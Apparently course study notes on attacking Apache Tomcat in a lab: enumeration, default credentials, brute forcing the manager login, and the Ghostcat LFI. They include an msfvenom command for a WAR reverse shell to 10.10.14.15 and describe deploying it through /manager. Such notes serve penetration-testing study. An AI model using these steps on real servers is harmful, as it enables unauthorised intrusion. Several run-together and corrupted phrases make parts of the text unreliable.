Open-source web server that hosts applications written in Java. It is often less apt to be exposed to the internet, far more common to come across in internal pentests.
Discovery
Tomcat servers can be identified by the Server header in the HTTP response. But custom error pages may be in use that do not leak this version information.
Tomcat server and version can be detected via
curl -s http://app-dev.inlanefreight.local:8080/docs/ | grep Tomcat Some important files to look at are
tomcat-users.xmlstores user credentials and their assigned roles. Also used to allow or disallow access to the/managerandhost-manageradmin pages.webapps/WEB-INF/web.xmlis the deployment descriptor which stores information about the routes used by the application and classes handling these routeswebapps/WEB-INF/classesare compiled classes used by the application that may contain business logic as well as sensitive informationwebapps/WEB-INF/jspcontains the JavaServer Pages, which is equivalent to PHP files on an Apache server.webapps/WEB-INF/web.xmldefines a configuration.- If we define a servlet
AdminServletthat is mapped to acom.inlanefreight.api.AdminServlet(Java uses a dot notation to create package names) giving a path ofclasses/com/inlanefreight/api/AdminServlet.class. - This file holds a lot of sensitive information and should be checked if an LFI vulnerability is found/
- If we define a servlet
Enumeration
We’ll typically look for the /manager or `/ho/ry brute forcing tool.
We can login via default credentials tomcat:tomcat and admin:admin. We can also try brute force attack against the login page.
Attacking
We can brute force the login page via the auxiliary /scanner/http/tomcat_mgr_loginin Metasploit.
Tomcat installations will usually provide a GUI to manage the application available at /manager/html which only users assigned to the manager-gui role are allowed to access. Valid users can then upload a packaged Tomcat application (.war file) to compromise the application.
A WAR file can be created using zip of a JSP web shell. Metasploit also offers generation of WAR files.
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.15 LPORT=4443 -f war > backup.warWe can even automate the process with multi/http/tomcat_mgr_upload.
CVE-2020-1938: Ghostcat
Unauthenticated LFI was found in Tomcat versions <9.031, 8.5.51, 7.0.100. Caused by a misconfiguration of the AJP protocol used by Tomcat running on port 8009, used to proxy request to application servers behind the front-end web servers. The exploit can only read